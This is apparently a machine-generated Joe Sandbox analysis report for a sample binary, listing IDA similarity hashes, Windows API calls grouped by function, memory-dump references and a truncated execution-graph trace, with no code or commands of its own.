                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@$EnvironmentExpandStrings$??2@
                          • String ID:
                          • API String ID: 612612615-0
                          • Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                          • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                          • Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                          • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                          APIs
                            • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                            • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
                          • SetWindowTextW.USER32(?,?), ref: 00403B12
                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@TextWindow$Length
                          • String ID:
                          • API String ID: 2308334395-0
                          • Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                          • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                          • Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                          • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                          APIs
                          • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                          • CreateFontIndirectW.GDI32(?), ref: 0040705B
                          • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                          • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: CreateFontIndirectItemMessageObjectSend
                          • String ID:
                          • API String ID: 2001801573-0
                          • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                          • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                          • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                          • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                          APIs
                          • GetParent.USER32(?), ref: 00401BA8
                          • GetWindowRect.USER32(?,?), ref: 00401BC1
                          • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                          • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ClientScreen$ParentRectWindow
                          • String ID:
                          • API String ID: 2099118873-0
                          • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                          • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                          • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                          • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: _wtol
                          • String ID: GUIFlags$[G@
                          • API String ID: 2131799477-2126219683
                          • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                          • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                          • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                          • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                          APIs
                          • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                          • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: EnvironmentVariable
                          • String ID: ?O@
                          • API String ID: 1431749950-3511380453
                          • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                          • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                          • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                          • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

                          Execution Graph

                          Execution Coverage:3.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:1.6%
                          Total number of Nodes:1734
                          Total number of Limit Nodes:37
                          execution_graph 18438 6fa639b0 18439 6fa639ee 18438->18439 18472 6fa61990 18439->18472 18441 6fa63a0a ctype 18478 6fa62370 18441->18478 18443 6fa63a69 ctype 18533 6fa61a10 18443->18533 18445 6fa63b12 18446 6fa63b16 18445->18446 18447 6fa63b77 18445->18447 18482 6fa61000 18446->18482 18448 6fa63b81 18447->18448 18449 6fa63c3b 18447->18449 18546 6fa63090 18448->18546 18578 6fa62c10 18449->18578 18454 6fa63b8c 18555 6fa631f0 18454->18555 18463 6fa63b4c ctype 18540 6fa67202 18463->18540 18466 6fa63b65 18599 6fa65590 18466->18599 18473 6fa619b4 18472->18473 18621 6fa668e2 18473->18621 18476 6fa668e2 ctype 62 API calls 18477 6fa619e7 18476->18477 18477->18441 18479 6fa6239f ctype 18478->18479 18975 6fa614a0 18479->18975 18481 6fa6240f 18481->18443 18483 6fa6102d ctype 18482->18483 18484 6fa631f0 98 API calls 18483->18484 18485 6fa61068 18484->18485 18486 6fa615f0 63 API calls 18485->18486 18487 6fa61077 18486->18487 18488 6fa63e60 18487->18488 19015 6fa73d6c 18488->19015 18490 6fa64443 18491 6fa668e2 ctype 62 API calls 18490->18491 18493 6fa64460 ctype 18491->18493 18492 6fa63b35 18508 6fa65070 18492->18508 19069 6fa7527b 18493->19069 18495 6fa644ae 19072 6fa66dc1 18495->19072 18497 6fa668e2 ctype 62 API calls 18503 6fa63ea7 _memset 18497->18503 18502 6fa6afc3 65 API calls 18502->18503 18503->18490 18503->18492 18503->18495 18503->18497 18503->18502 18505 6fa640fd 18503->18505 19029 6fa65ca0 18503->19029 19041 6fa6b1ec 18503->19041 18505->18503 18507 6fa66750 ReadFile 18505->18507 19047 6fa65e70 18505->19047 19052 6fa66230 18505->19052 19057 6fa66160 18505->19057 19062 6fa663f0 18505->19062 18507->18505 18510 6fa650a6 18508->18510 18509 6fa6525a 18511 6fa653de 18509->18511 18514 6fa653e3 18509->18514 18518 6fa652bf 18509->18518 19170 6fa645f0 18509->19170 18510->18509 18510->18511 18513 6fa6538f 18510->18513 19115 6fa64880 18510->19115 19135 6fa64ac0 18510->19135 18512 6fa66dc1 ctype 2 API calls 18511->18512 18512->18514 18515 6fa668e2 ctype 62 API calls 18513->18515 18517 6fa668e2 ctype 62 API calls 18514->18517 18524 6fa65396 ctype 18515->18524 18522 6fa653ea ctype 18517->18522 19174 6fa647d0 18518->19174 18523 6fa7527b __CxxThrowException@8 RaiseException 18522->18523 18526 6fa65432 18523->18526 18525 6fa7527b __CxxThrowException@8 RaiseException 18524->18525 18525->18511 18528 6fa6530c 18528->18463 18529 6fa631f0 98 API calls 18532 6fa65141 18529->18532 18530 6fa62600 96 API calls 18530->18532 18532->18510 18532->18529 18532->18530 19159 6fa662d0 18532->19159 19164 6fa65490 18532->19164 19428 6fa6764f 18533->19428 18535 6fa61a59 ctype 18539 6fa61af7 18535->18539 19443 6fa672fd 18535->19443 18537 6fa61ab1 GetDiskFreeSpaceW 18537->18539 18539->18445 18541 6fa67212 CloseHandle 18540->18541 18542 6fa67220 ctype 18540->18542 18541->18542 18543 6fa67236 GetLastError 18542->18543 18544 6fa67244 18542->18544 19530 6fa67bcb 18543->19530 18544->18466 19544 6fa62f60 18546->19544 18548 6fa6309f 18549 6fa630a7 18548->18549 18550 6fa630bc 18548->18550 19558 6fa63370 18549->19558 19566 6fa61580 18550->19566 18553 6fa630c7 18553->18454 18554 6fa630b8 18554->18454 18556 6fa63222 ctype 18555->18556 18557 6fa6aef1 ___DllMainCRTStartup 31 API calls 18556->18557 18558 6fa63254 18557->18558 19575 6fa633f0 FindResourceExW 18558->19575 18560 6fa63268 18561 6fa6326c 18560->18561 18563 6fa6aef1 ___DllMainCRTStartup 31 API calls 18560->18563 18562 6fa61580 62 API calls 18561->18562 18572 6fa63279 18562->18572 18564 6fa632bf 18563->18564 18565 6fa633f0 66 API calls 18564->18565 18566 6fa632d3 18565->18566 18567 6fa632d7 18566->18567 18568 6fa63308 18566->18568 18569 6fa61580 62 API calls 18567->18569 18570 6fa6a58c 31 API calls 18568->18570 18569->18572 18571 6fa6330e 18570->18571 18571->18561 18573 6fa63325 18571->18573 18575 6fa62600 18572->18575 18574 6fa62b50 94 API calls 18573->18574 18574->18572 19589 6fa61240 18575->19589 18577 6fa62613 18577->18466 18579 6fa62c51 ctype 18578->18579 18580 6fa62cc0 18579->18580 18582 6fa631f0 98 API calls 18579->18582 18581 6fa631f0 98 API calls 18580->18581 18583 6fa62cf9 18581->18583 18584 6fa62cad 18582->18584 18585 6fa62600 96 API calls 18583->18585 18586 6fa744cb 62 API calls 18584->18586 18587 6fa62d0b 18585->18587 18586->18580 18588 6fa66911 ctype 63 API calls 18587->18588 18589 6fa62d3c 18587->18589 18588->18589 18590 6fa615f0 18589->18590 18591 6fa6165a 18590->18591 18593 6fa61606 18590->18593 18591->18466 18592 6fa61646 18594 6fa614a0 ctype 63 API calls 18592->18594 18593->18592 18595 6fa61616 18593->18595 18596 6fa61652 18594->18596 18597 6fa61580 62 API calls 18595->18597 18596->18466 18598 6fa6161d 18597->18598 18598->18466 18600 6fa655bb 18599->18600 18604 6fa63d8b 18599->18604 18601 6fa631f0 98 API calls 18600->18601 18600->18604 18602 6fa655d1 18601->18602 18603 6fa62600 96 API calls 18602->18603 18603->18604 18605 6fa62490 18604->18605 18606 6fa624d1 ctype 18605->18606 19858 6fa67343 18606->19858 18624 6fa668ea 18621->18624 18623 6fa619be 18623->18476 18624->18623 18625 6fa749fe 18624->18625 18626 6fa74ab1 18625->18626 18627 6fa74a10 18625->18627 18628 6fa7c08e _realloc 6 API calls 18626->18628 18634 6fa74aa9 18627->18634 18635 6fa74a6d HeapAlloc 18627->18635 18637 6fa74a9d 18627->18637 18640 6fa74aa2 18627->18640 18642 6fa7c046 18627->18642 18651 6fa7be9b 18627->18651 18685 6fa75c53 18627->18685 18688 6fa749af 18627->18688 18696 6fa7c08e 18627->18696 18629 6fa74ab7 18628->18629 18631 6fa75348 _realloc 61 API calls 18629->18631 18631->18634 18634->18624 18635->18627 18699 6fa75348 18637->18699 18641 6fa75348 _realloc 61 API calls 18640->18641 18641->18634 18702 6fa80cfc 18642->18702 18645 6fa7c05a 18647 6fa7be9b __NMSG_WRITE 62 API calls 18645->18647 18649 6fa7c07c 18645->18649 18646 6fa80cfc __set_error_mode 62 API calls 18646->18645 18648 6fa7c072 18647->18648 18650 6fa7be9b __NMSG_WRITE 62 API calls 18648->18650 18649->18627 18650->18649 18652 6fa7beaf 18651->18652 18653 6fa80cfc __set_error_mode 59 API calls 18652->18653 18684 6fa7c00a 18652->18684 18654 6fa7bed1 18653->18654 18655 6fa7c00f GetStdHandle 18654->18655 18657 6fa80cfc __set_error_mode 59 API calls 18654->18657 18656 6fa7c01d _strlen 18655->18656 18655->18684 18660 6fa7c036 WriteFile 18656->18660 18656->18684 18658 6fa7bee2 18657->18658 18658->18655 18659 6fa7bef4 18658->18659 18659->18684 18725 6fa80997 18659->18725 18660->18684 18663 6fa7bf2a GetModuleFileNameA 18665 6fa7bf48 18663->18665 18670 6fa7bf6b _strlen 18663->18670 18667 6fa80997 _strcpy_s 59 API calls 18665->18667 18668 6fa7bf58 18667->18668 18668->18670 18671 6fa78034 __invoke_watson 10 API calls 18668->18671 18669 6fa7bfae 18750 6fa80bd3 18669->18750 18670->18669 18741 6fa80c47 18670->18741 18671->18670 18675 6fa7bfd2 18678 6fa80bd3 _strcat_s 59 API calls 18675->18678 18677 6fa78034 __invoke_watson 10 API calls 18677->18675 18679 6fa7bfe6 18678->18679 18681 6fa7bff7 18679->18681 18682 6fa78034 __invoke_watson 10 API calls 18679->18682 18680 6fa78034 __invoke_watson 10 API calls 18680->18669 18759 6fa80a6a 18681->18759 18682->18681 18684->18627 18810 6fa75c28 GetModuleHandleW 18685->18810 18689 6fa749bb _realloc 18688->18689 18690 6fa749ec _realloc 18689->18690 18813 6fa7a914 18689->18813 18690->18627 18692 6fa749d1 18820 6fa7b126 18692->18820 18697 6fa7a033 __decode_pointer 6 API calls 18696->18697 18698 6fa7c09e 18697->18698 18698->18627 18894 6fa7a206 GetLastError 18699->18894 18701 6fa7534d 18701->18640 18703 6fa80d0b 18702->18703 18704 6fa75348 _realloc 62 API calls 18703->18704 18705 6fa7c04d 18703->18705 18706 6fa80d2e 18704->18706 18705->18645 18705->18646 18708 6fa7815c 18706->18708 18711 6fa7a033 TlsGetValue 18708->18711 18710 6fa7816c __invoke_watson 18712 6fa7a06c GetModuleHandleW 18711->18712 18713 6fa7a04b 18711->18713 18715 6fa7a087 GetProcAddress 18712->18715 18716 6fa7a07c 18712->18716 18713->18712 18714 6fa7a055 TlsGetValue 18713->18714 18720 6fa7a060 18714->18720 18717 6fa7a064 18715->18717 18721 6fa75bcf 18716->18721 18717->18710 18720->18712 18720->18717 18722 6fa75bda Sleep GetModuleHandleW 18721->18722 18723 6fa75bfc 18722->18723 18724 6fa75bf8 18722->18724 18723->18715 18723->18717 18724->18722 18724->18723 18726 6fa809a8 18725->18726 18727 6fa809af 18725->18727 18726->18727 18732 6fa809d5 18726->18732 18728 6fa75348 _realloc 62 API calls 18727->18728 18729 6fa809b4 18728->18729 18730 6fa7815c __close 6 API calls 18729->18730 18731 6fa7bf16 18730->18731 18731->18663 18734 6fa78034 18731->18734 18732->18731 18733 6fa75348 _realloc 62 API calls 18732->18733 18733->18729 18786 6fa755b0 18734->18786 18736 6fa78061 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18737 6fa78131 __invoke_watson 18736->18737 18738 6fa7813d GetCurrentProcess TerminateProcess 18736->18738 18737->18738 18788 6fa73f34 18738->18788 18740 6fa7815a 18740->18663 18744 6fa80c59 18741->18744 18742 6fa80c5d 18743 6fa75348 _realloc 62 API calls 18742->18743 18745 6fa7bf9b 18742->18745 18749 6fa80c79 18743->18749 18744->18742 18744->18745 18747 6fa80ca3 18744->18747 18745->18669 18745->18680 18746 6fa7815c __close 6 API calls 18746->18745 18747->18745 18748 6fa75348 _realloc 62 API calls 18747->18748 18748->18749 18749->18746 18751 6fa80beb 18750->18751 18753 6fa80be4 18750->18753 18752 6fa75348 _realloc 62 API calls 18751->18752 18758 6fa80bf0 18752->18758 18753->18751 18755 6fa80c1f 18753->18755 18754 6fa7815c __close 6 API calls 18756 6fa7bfc1 18754->18756 18755->18756 18757 6fa75348 _realloc 62 API calls 18755->18757 18756->18675 18756->18677 18757->18758 18758->18754 18797 6fa7a02a 18759->18797 18762 6fa80a8d LoadLibraryA 18764 6fa80bb7 18762->18764 18765 6fa80aa2 GetProcAddress 18762->18765 18763 6fa80b3f 18769 6fa7a033 __decode_pointer 6 API calls 18763->18769 18783 6fa80b6a 18763->18783 18764->18684 18765->18764 18767 6fa80ab8 18765->18767 18766 6fa80b15 18766->18763 18770 6fa7a033 __decode_pointer 6 API calls 18766->18770 18800 6fa79fb8 TlsGetValue 18767->18800 18768 6fa7a033 __decode_pointer 6 API calls 18768->18764 18779 6fa80b82 18769->18779 18772 6fa80b32 18770->18772 18775 6fa7a033 __decode_pointer 6 API calls 18772->18775 18774 6fa79fb8 __encode_pointer 6 API calls 18776 6fa80ad3 GetProcAddress 18774->18776 18775->18763 18777 6fa79fb8 __encode_pointer 6 API calls 18776->18777 18778 6fa80ae8 GetProcAddress 18777->18778 18780 6fa79fb8 __encode_pointer 6 API calls 18778->18780 18781 6fa7a033 __decode_pointer 6 API calls 18779->18781 18779->18783 18782 6fa80afd 18780->18782 18781->18783 18782->18766 18784 6fa80b07 GetProcAddress 18782->18784 18783->18768 18785 6fa79fb8 __encode_pointer 6 API calls 18784->18785 18785->18766 18787 6fa755bc __VEC_memzero 18786->18787 18787->18736 18789 6fa73f3e IsDebuggerPresent 18788->18789 18790 6fa73f3c 18788->18790 18796 6fa7ee35 18789->18796 18790->18740 18793 6fa77c7e SetUnhandledExceptionFilter UnhandledExceptionFilter 18794 6fa77ca3 GetCurrentProcess TerminateProcess 18793->18794 18795 6fa77c9b __invoke_watson 18793->18795 18794->18740 18795->18794 18796->18793 18798 6fa79fb8 __encode_pointer 6 API calls 18797->18798 18799 6fa7a031 18798->18799 18799->18762 18799->18766 18801 6fa79ff1 GetModuleHandleW 18800->18801 18802 6fa79fd0 18800->18802 18803 6fa7a001 18801->18803 18804 6fa7a00c GetProcAddress 18801->18804 18802->18801 18805 6fa79fda TlsGetValue 18802->18805 18806 6fa75bcf __crt_waiting_on_module_handle 2 API calls 18803->18806 18809 6fa79fe9 GetProcAddress 18804->18809 18807 6fa79fe5 18805->18807 18808 6fa7a007 18806->18808 18807->18801 18807->18809 18808->18804 18808->18809 18809->18774 18811 6fa75c4c ExitProcess 18810->18811 18812 6fa75c3c GetProcAddress 18810->18812 18812->18811 18814 6fa7a93c EnterCriticalSection 18813->18814 18815 6fa7a929 18813->18815 18814->18692 18829 6fa7a851 18815->18829 18817 6fa7a92f 18817->18814 18855 6fa75bff 18817->18855 18821 6fa7b154 18820->18821 18822 6fa7b1ed 18821->18822 18824 6fa749dc 18821->18824 18882 6fa7ac8d 18821->18882 18822->18824 18889 6fa7ad3d 18822->18889 18826 6fa749f5 18824->18826 18893 6fa7a83a LeaveCriticalSection 18826->18893 18828 6fa749fc 18828->18690 18830 6fa7a85d _realloc 18829->18830 18831 6fa7a883 18830->18831 18832 6fa7c046 __FF_MSGBANNER 62 API calls 18830->18832 18837 6fa7a893 _realloc 18831->18837 18862 6fa7a5c3 18831->18862 18833 6fa7a872 18832->18833 18835 6fa7be9b __NMSG_WRITE 62 API calls 18833->18835 18838 6fa7a879 18835->18838 18837->18817 18842 6fa75c53 __mtinitlocknum 3 API calls 18838->18842 18839 6fa7a8a5 18843 6fa75348 _realloc 62 API calls 18839->18843 18840 6fa7a8b4 18841 6fa7a914 __lock 62 API calls 18840->18841 18844 6fa7a8bb 18841->18844 18842->18831 18843->18837 18845 6fa7a8c3 18844->18845 18846 6fa7a8ef 18844->18846 18867 6fa7e1d3 18845->18867 18848 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 18846->18848 18850 6fa7a8e0 18848->18850 18849 6fa7a8ce 18849->18850 18871 6fa74618 18849->18871 18877 6fa7a90b 18850->18877 18853 6fa7a8da 18854 6fa75348 _realloc 62 API calls 18853->18854 18854->18850 18856 6fa7c046 __FF_MSGBANNER 62 API calls 18855->18856 18857 6fa75c09 18856->18857 18858 6fa7be9b __NMSG_WRITE 62 API calls 18857->18858 18859 6fa75c11 18858->18859 18860 6fa7a033 __decode_pointer 6 API calls 18859->18860 18861 6fa75c1c 18860->18861 18861->18814 18865 6fa7a5cc 18862->18865 18863 6fa749fe _malloc 61 API calls 18863->18865 18864 6fa7a602 18864->18839 18864->18840 18865->18863 18865->18864 18866 6fa7a5e3 Sleep 18865->18866 18866->18865 18880 6fa753bc 18867->18880 18869 6fa7e1df InitializeCriticalSectionAndSpinCount 18870 6fa7e223 _realloc 18869->18870 18870->18849 18872 6fa74624 _realloc 18871->18872 18873 6fa74677 HeapFree 18872->18873 18874 6fa746a0 _realloc 18872->18874 18873->18874 18875 6fa7468a 18873->18875 18874->18853 18876 6fa75348 _realloc 61 API calls 18875->18876 18876->18874 18881 6fa7a83a LeaveCriticalSection 18877->18881 18879 6fa7a912 18879->18837 18880->18869 18881->18879 18883 6fa7acd4 HeapAlloc 18882->18883 18884 6fa7aca0 HeapReAlloc 18882->18884 18886 6fa7acbe 18883->18886 18887 6fa7acf7 VirtualAlloc 18883->18887 18885 6fa7acc2 18884->18885 18884->18886 18885->18883 18886->18822 18887->18886 18888 6fa7ad11 HeapFree 18887->18888 18888->18886 18890 6fa7ad54 VirtualAlloc 18889->18890 18892 6fa7ad9b 18890->18892 18892->18824 18893->18828 18908 6fa7a0ae TlsGetValue 18894->18908 18897 6fa7a273 SetLastError 18897->18701 18900 6fa7a033 __decode_pointer 6 API calls 18901 6fa7a24b 18900->18901 18902 6fa7a252 18901->18902 18903 6fa7a26a 18901->18903 18919 6fa7a11f 18902->18919 18904 6fa74618 ___crtGetEnvironmentStringsA 59 API calls 18903->18904 18906 6fa7a270 18904->18906 18906->18897 18907 6fa7a25a GetCurrentThreadId 18907->18897 18909 6fa7a0c3 18908->18909 18910 6fa7a0de 18908->18910 18911 6fa7a033 __decode_pointer 6 API calls 18909->18911 18910->18897 18913 6fa7a608 18910->18913 18912 6fa7a0ce TlsSetValue 18911->18912 18912->18910 18914 6fa7a611 18913->18914 18916 6fa7a231 18914->18916 18917 6fa7a62f Sleep 18914->18917 18937 6fa7b40b 18914->18937 18916->18897 18916->18900 18918 6fa7a644 18917->18918 18918->18914 18918->18916 18954 6fa753bc 18919->18954 18921 6fa7a12b GetModuleHandleW 18922 6fa7a141 18921->18922 18923 6fa7a13b 18921->18923 18925 6fa7a17d 18922->18925 18926 6fa7a159 GetProcAddress GetProcAddress 18922->18926 18924 6fa75bcf __crt_waiting_on_module_handle 2 API calls 18923->18924 18924->18922 18927 6fa7a914 __lock 58 API calls 18925->18927 18926->18925 18928 6fa7a19c InterlockedIncrement 18927->18928 18955 6fa7a1f4 18928->18955 18931 6fa7a914 __lock 58 API calls 18932 6fa7a1bd 18931->18932 18958 6fa80414 InterlockedIncrement 18932->18958 18934 6fa7a1db 18970 6fa7a1fd 18934->18970 18936 6fa7a1e8 _realloc 18936->18907 18938 6fa7b417 _realloc 18937->18938 18939 6fa7b42f 18938->18939 18949 6fa7b44e _memset 18938->18949 18940 6fa75348 _realloc 61 API calls 18939->18940 18941 6fa7b434 18940->18941 18942 6fa7815c __close 6 API calls 18941->18942 18944 6fa7b444 _realloc 18942->18944 18943 6fa7b4c0 RtlAllocateHeap 18943->18949 18944->18914 18945 6fa7c08e _realloc 6 API calls 18945->18949 18946 6fa7a914 __lock 61 API calls 18946->18949 18947 6fa7b126 ___sbh_alloc_block 5 API calls 18947->18949 18949->18943 18949->18944 18949->18945 18949->18946 18949->18947 18950 6fa7b507 18949->18950 18953 6fa7a83a LeaveCriticalSection 18950->18953 18952 6fa7b50e 18952->18949 18953->18952 18954->18921 18973 6fa7a83a LeaveCriticalSection 18955->18973 18957 6fa7a1b6 18957->18931 18959 6fa80432 InterlockedIncrement 18958->18959 18960 6fa80435 18958->18960 18959->18960 18961 6fa8043f InterlockedIncrement 18960->18961 18962 6fa80442 18960->18962 18961->18962 18963 6fa8044c InterlockedIncrement 18962->18963 18964 6fa8044f 18962->18964 18963->18964 18965 6fa80459 InterlockedIncrement 18964->18965 18967 6fa8045c 18964->18967 18965->18967 18966 6fa80475 InterlockedIncrement 18966->18967 18967->18966 18968 6fa80490 InterlockedIncrement 18967->18968 18969 6fa80485 InterlockedIncrement 18967->18969 18968->18934 18969->18967 18974 6fa7a83a LeaveCriticalSection 18970->18974 18972 6fa7a204 18972->18936 18973->18957 18974->18972 18976 6fa614b6 18975->18976 18977 6fa614ac ctype 18975->18977 18978 6fa614ed 18976->18978 18985 6fa613f0 18976->18985 18977->18481 18980 6fa614fd 18978->18980 18981 6fa6150a 18978->18981 18990 6fa73fc0 18980->18990 19002 6fa73f43 18981->19002 18984 6fa61508 18984->18481 18986 6fa61330 ctype 18985->18986 18987 6fa613b0 ctype 18986->18987 18988 6fa73f43 _memcpy_s 62 API calls 18986->18988 18987->18978 18989 6fa6137d 18988->18989 18989->18978 18992 6fa73fd0 18990->18992 19001 6fa73fe9 18990->19001 18991 6fa73fd5 18993 6fa75348 _realloc 62 API calls 18991->18993 18992->18991 18994 6fa73ff5 18992->18994 18995 6fa73fda 18993->18995 18996 6fa73ffa 18994->18996 18997 6fa74008 18994->18997 19000 6fa7815c __close 6 API calls 18995->19000 18998 6fa75348 _realloc 62 API calls 18996->18998 19011 6fa78190 18997->19011 18998->18995 19000->19001 19001->18984 19005 6fa73f57 _memset 19002->19005 19007 6fa73f53 ___crtGetEnvironmentStringsA 19002->19007 19003 6fa73f5c 19004 6fa75348 _realloc 62 API calls 19003->19004 19006 6fa73f61 19004->19006 19005->19003 19005->19007 19009 6fa73fa6 19005->19009 19008 6fa7815c __close 6 API calls 19006->19008 19007->18984 19008->19007 19009->19007 19010 6fa75348 _realloc 62 API calls 19009->19010 19010->19006 19012 6fa781a8 19011->19012 19013 6fa781cf __VEC_memcpy 19012->19013 19014 6fa781d7 19012->19014 19013->19014 19014->19001 19022 6fa73d7f 19015->19022 19016 6fa66dc1 ctype 2 API calls 19016->19022 19017 6fa73d92 19077 6fa66911 19017->19077 19019 6fa73dad 19020 6fa668e2 ctype 62 API calls 19019->19020 19021 6fa73d9a _memset 19020->19021 19021->18503 19022->19016 19022->19017 19022->19019 19022->19021 19023 6fa73e3c 19022->19023 19024 